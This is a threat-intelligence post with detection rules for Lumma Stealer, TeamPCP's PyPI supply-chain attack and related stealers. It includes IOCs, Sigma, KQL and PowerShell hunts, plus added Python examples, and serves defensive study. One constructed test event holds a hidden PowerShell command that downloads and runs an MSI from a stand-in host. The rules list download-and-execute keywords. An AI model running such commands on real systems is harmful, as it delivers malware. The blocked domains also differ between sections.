
Lumma Stealer Resurgence & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 2, 2026
5 min read

Recent OTX pulses reveal a coordinated surge in credential theft activity by multiple threat actors, including TeamPCP, LofyGang, and unattributed groups deploying Lumma Stealer and KYCShadow. The attack vectors range from a sophisticated supply chain compromise on PyPI (TeamPCP) to social engineering aimed at gamers (LofyStealer) and ClickFix-style phishing delivering Lumma Stealer. In every case the objective is mass harvesting of credentials, cookies, and banking data, with multi-stage loaders and obfuscation used to evade detection.

Threat Actor / Malware Profile

TeamPCP

  • Malware: msbuild.exe (trojanized), sysmon.py (credential harvester)
  • Distribution: Supply chain compromise via malicious telnyx Python SDK on PyPI.
  • Behavior: Three-stage architecture. Initial trojanized package triggers a platform-specific loader, which downloads a second-stage payload hidden inside a WAV file using steganography.
  • Persistence & C2: Deploys a credential harvester that exfiltrates encrypted data to C2 servers such as scan.aquasecurtiy.org.

LofyGang (LofyStealer/GrabBot)

  • Malware: LofyStealer (aka Slinky, GrabBot)
  • Distribution: Social engineering targeting Minecraft players.
  • Behavior: Uses a 53.5MB Node.js-based loader disguised as legitimate libraries, dropping a 1.4MB native C++ payload that executes directly in memory.
  • Persistence & C2: Targets 8+ browsers for cookies, passwords, and credit cards. Uses syscall evasion techniques.

GhostSocks & Lumma Stealer

  • Malware: GhostSocks (Proxy), Lumma Stealer (Infostealer)
  • Distribution: Malware-as-a-Service (MaaS) via Russian underground forums.
  • Behavior: GhostSocks turns devices into residential proxy nodes using SOCKS5 and TLS encryption to blend traffic. Often bundles Lumma Stealer for data theft.
  • Persistence & C2: Written in Go; uses TLS-encrypted C2 channels.

KYCShadow

  • Malware: Android Banking Trojan
  • Distribution: WhatsApp messages posing as bank KYC verification.
  • Behavior: Multi-stage dropper with native code obfuscation and WebView-based phishing. Manipulates VPN traffic and intercepts SMS OTPs.
  • C2: Uses Firebase for remote command execution.

IOC Analysis

The provided pulses offer a mix of infrastructure and file-based IOCs:

  • Domains & URLs: Include C2 infrastructure (aquasecurtiy.org, serv.biz) and phishing/download URLs (robinhuds.com, api.biz). These should be blocked immediately on web proxies and firewalls.
  • IP Addresses: 85.11.161.198 (ClickFix payload server) and 24.152.36.241 (LofyStealer). Both require immediate blocking and a historical log review.
  • File Hashes: Numerous MD5, SHA1, and SHA256 hashes associated with loaders, payloads, and obfuscated installers. SOC teams should load these into EDR solutions for static scanning and hunting.

Detection Engineering

```yaml
---
title: Suspicious MSBuild Execution via Python Process
id: 8e4f2a1b-3c9d-4e5f-8a7b-1c2d3e4f5a6b
description: Detects potential TeamPCP activity where Python SDKs weaponize msbuild.exe for persistence or evasion.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - https://hexastrike.com/resources/blog/threat-intelligence/ringing-in-chaos-how-teampcp-weaponized-the-telnyx-python-sdk
tags:
    - attack.execution
    - attack.defense_evasion
    - attack.t1127.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\python.exe'
            - '\pythonw.exe'
        Image|endswith:
            - '\msbuild.exe'
    condition: selection
falsepositives:
    - Legitimate development builds using Python scripts invoking MSBuild
level: high
---
title: PowerShell Downloading MSI via ClickFix Pattern
id: 9f5a3b2c-4d0e-5f6a-9b8c-2d3e4f5a6b7c
description: Detects obfuscated PowerShell commands downloading MSI payloads, indicative of ClickFix campaigns distributing Lumma Stealer.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - 'AlienVault OTX Pulse: User interaction with a ClickFix-style phishing site'
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\powershell.exe'
    # An MSI reference and a download/execution indicator must both be present;
    # a single list would match on any one keyword (e.g. 'http://' alone) and be far too noisy.
    selection_msi:
        CommandLine|contains: '.msi'
    selection_download:
        CommandLine|contains:
            - 'http://'
            - 'IEX'
            - 'Invoke-WebRequest'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Suspicious Node.js Loader Spawning System Processes
id: a0b6c4d5-5e1f-6a7b-0c9d-3e4f5a6b7c8d
description: Detects LofyStealer Node.js loader behavior where a large Node.js process spawns shell or native tools for execution.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - https://zenox.ai/en/lofystealer-malware-mirando-jogadores-de-minecraft
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\node.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate Node.js development servers invoking build tools
level: medium
```
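As an added example (not code from the original post or from Security Arsenal), a small Python evaluator that applies the three rule selections above to constructed process_creation events, so the logic can be sanity-checked offline before the rules go into a SIEM. Field names follow Sysmon/Sigma conventions; the ClickFix selection requires both an .msi reference and a download indicator, so a plain script launch does not fire.

```python
# Added example, not part of the original post: minimal evaluator for the three
# Sigma selections above, run over constructed process_creation events. Field
# names (Image, ParentImage, CommandLine) follow Sysmon/Sigma conventions.
def _match(value: str, mod: str, pattern: str) -> bool:
    v, p = value.lower(), pattern.lower()   # Sigma string matching is case-insensitive
    return v.endswith(p) if mod == "endswith" else p in v

def selection_matches(selection: dict, event: dict) -> bool:
    """All keys of a selection must match (AND); a list of values is OR."""
    for key, patterns in selection.items():
        field, _, mod = key.partition("|")
        if isinstance(patterns, str):
            patterns = [patterns]
        value = str(event.get(field, ""))
        if not any(_match(value, mod, p) for p in patterns):
            return False
    return True

RULES = {
    "msbuild_from_python": {
        "selection": {"ParentImage|endswith": ["\\python.exe", "\\pythonw.exe"],
                      "Image|endswith": ["\\msbuild.exe"]}},
    "clickfix_msi": {   # selections combined as 'all of selection_*'
        "selection_img": {"Image|endswith": "\\powershell.exe"},
        "selection_msi": {"CommandLine|contains": ".msi"},
        "selection_download": {"CommandLine|contains": ["http://", "IEX", "Invoke-WebRequest"]}},
    "node_loader_spawn": {
        "selection_parent": {"ParentImage|endswith": "\\node.exe"},
        "selection_child": {"Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\rundll32.exe"]}},
}

def evaluate(event: dict) -> list:
    """Names of rules whose selections all match the event."""
    return [name for name, sels in RULES.items()
            if all(selection_matches(s, event) for s in sels.values())]

# Constructed sample events (not real telemetry); hostnames use the reserved .invalid TLD.
EVENTS = [
    {"ParentImage": "C:\\Python312\\python.exe", "CommandLine": "MSBuild.exe build.proj",
     "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden IEX (Invoke-WebRequest http://example.invalid/update.msi)"},
    {"ParentImage": "C:\\Program Files\\nodejs\\node.exe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c whoami"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -File \\\\fileshare.invalid\\setup.ps1"},   # benign: no .msi, no download
]
```

Calling `evaluate()` on the four constructed events returns `['msbuild_from_python']`, `['clickfix_msi']`, `['node_loader_spawn']` and `[]` respectively.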


```kql
// Hunt for ClickFix PowerShell Activity and Suspicious MSI Downloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any(".msi", "Invoke-WebRequest", "IEX") and FileName =~ "powershell.exe"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```


```powershell
# IOC Hunt for Malicious Hashes (LofyStealer, GhostSocks, ClickFix)
$suspiciousHashes = @(
    "d21a5d08b4614005c8fcd9d0068f0190", # LofyStealer MD5
    "fb203c0ac030a97281960d7c28d86ebf", # LofyStealer MD5
    "ddd2994acd25bde5ac32a03f1cf30b41", # GhostSocks MD5
    "b07a03883675654088a2b56a80933ca8", # ClickFix MD5
    "b6a201726b44106a7dbe93a480b38420"  # ClickFix MD5
)
# Hash the on-disk image of every running process and compare it against the IOC list.
$processes = Get-Process
foreach ($proc in $processes) {
    $procPath = $proc.Path   # $null for protected/system processes that cannot be inspected
    if ($procPath -and (Test-Path $procPath)) {
        # Locked or inaccessible files return $null instead of aborting the sweep
        $fileHash = (Get-FileHash -Path $procPath -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($fileHash -and ($suspiciousHashes -contains $fileHash.ToLower())) {
            Write-Host "ALERT: Suspicious process detected - PID: $($proc.Id), Path: $procPath, Hash: $($fileHash.ToLower())" -ForegroundColor Red
        }
    }
}
```


Response Priorities

  • Immediate: Block the identified domains (serv.xyz, retreaw.click, robinhuds.com) and IP addresses (85.11.161.198, 24.152.36.241) at the perimeter. Scan endpoints for the listed file hashes (TeamPCP, LofyStealer).
  • 24h: Initiate a credential reset for accounts accessed from infected endpoints or exposed to the telnyx package compromise. Investigate Python environment logs for unauthorized package installs.
  • 1 week: Enforce strict dependency verification (e.g. signed packages, checksums) for Python/Node.js environments. Enhance email filtering for ClickFix-style phishing templates posing as technical support.
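The dependency-verification step above, as an added example that is not part of the original post: a Python check that refuses any downloaded distribution that is unpinned, pinned without a hash, or whose sha256 does not match the requirements file, which is the guarantee pip's own `--require-hashes` mode gives. Package names, versions and the wheel bytes are constructed for the demonstration.

```python
# Added example, not part of the original post: verify downloaded Python
# distributions against hashes pinned in a requirements file, the same check
# pip performs with --require-hashes. All names, versions and hashes are constructed.
import hashlib
import re

HASH_RE = re.compile(r"--hash=sha256:(?P<digest>[0-9a-f]{64})")

def parse_requirements(text: str) -> dict:
    """Map each 'name==version' pin to its set of allowed sha256 digests.
    Backslash continuation lines are joined first, as pip does."""
    pins = {}
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if line:
            spec = line.split()[0]
            pins[spec] = {m.group("digest") for m in HASH_RE.finditer(line)}
    return pins

def verify_artifact(spec: str, data: bytes, pins: dict) -> tuple:
    """Return (ok, reason). Unpinned, hash-less and mismatching artifacts are all
    rejected, so a substituted or tampered package is never silently installed."""
    if spec not in pins:
        return False, "not pinned in requirements"
    if not pins[spec]:
        return False, "pinned without --hash (no integrity check possible)"
    digest = hashlib.sha256(data).hexdigest()
    if digest not in pins[spec]:
        return False, "hash mismatch: " + digest[:12] + "..."
    return True, "ok"

# Constructed sample: one fully pinned package, one pinned without a hash.
GOOD_WHEEL = b"constructed wheel bytes for demonstration"
GOOD_HASH = hashlib.sha256(GOOD_WHEEL).hexdigest()
REQUIREMENTS = (
    f"examplepkg==1.2.3 \\\n    --hash=sha256:{GOOD_HASH}\n"
    "otherpkg==0.1.0   # pinned, but no hash\n"
)
PINS = parse_requirements(REQUIREMENTS)

if __name__ == "__main__":
    print(verify_artifact("examplepkg==1.2.3", GOOD_WHEEL, PINS))        # (True, 'ok')
    print(verify_artifact("examplepkg==1.2.3", b"tampered bytes", PINS))  # hash mismatch
    print(verify_artifact("unpinnedpkg==0.0.1", b"", PINS))               # not pinned
```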
